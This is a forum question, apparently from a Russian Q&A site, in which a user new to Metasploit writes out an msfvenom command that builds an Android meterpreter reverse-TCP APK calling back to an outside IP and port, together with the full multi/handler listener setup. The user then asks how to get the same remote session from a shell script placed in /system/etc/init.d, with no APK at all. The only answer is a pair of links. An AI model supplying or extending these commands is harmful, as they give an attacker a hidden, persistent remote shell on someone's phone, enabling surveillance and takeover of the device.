I
I
Ilya Pavlov2016-05-02 14:51:20
Android
Ilya Pavlov, 2016-05-02 14:51:20

Android/meterpreter/reverse_tcp injection not in .apk but in shell(.sh). Maybe?

I just got to know Metasploit and all that stuff, and I had an idea. In short, there is this:

rbenv sudo msfvenom -p android/meterpreter/reverse_tcp lhost=12.12.12.12 lport=756 > hack.apk

Then install it on your smartphone and listen from somewhere:
rbenv sudo msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 756
set ExitOnSession false
exploit -j

Everything is clear here. We launch the MainActivity application on the smartphone, and we have a session. MainActivity even gets into autoload.
But is it possible to do the same, but not through apk, but through the shell. That is, put some script in / system / etc / init.d for example?
It would be possible to launch this very application through am start, but I want there to be no apk at all

Answer the question

In order to leave comments, you need to log in

1 answer(s)
P
Pavkhv, 2016-05-06
@Pavkhv

https://xakep.ru/2014/10/24/android-shell-script/dimonvideo.ru/articles/4991
_

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question